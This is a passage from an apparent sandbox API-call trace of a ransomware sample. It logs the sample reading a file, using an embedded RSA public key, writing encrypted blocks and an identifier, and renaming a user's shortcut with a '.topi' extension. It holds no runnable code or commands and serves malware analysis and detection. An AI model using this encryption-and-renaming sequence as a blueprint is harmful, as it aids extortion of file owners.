dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.522] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.523] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.523] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.523] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.523] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.523] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.523] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.524] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.524] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.524] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.524] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.524] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.524] GetLastError () returned 0x0 [0096.524] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.524] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.524] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.524] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.524] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.524] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.525] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02990 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a029d8 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4988 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49a0 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.525] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49a0 | out: hHeap=0x680000) returned 1 [0096.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e49a0 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49a0 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.526] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.526] GetCurrentThreadId () returned 0x8c4 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8070 [0096.526] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.527] GetCurrentThreadId () returned 0x8c4 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.527] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49a0 [0096.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a00 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49a0 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49a0 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49a0 | out: hHeap=0x680000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a00 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a029d8 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.532] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.532] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.532] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.532] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.532] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.533] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.533] CloseHandle (hObject=0x6a8) returned 1 [0096.545] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.545] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.545] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.545] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.topi")) returned 1 [0096.546] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.546] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.546] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.548] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0096.548] FindClose (in: hFindFile=0x31c7500 | out: 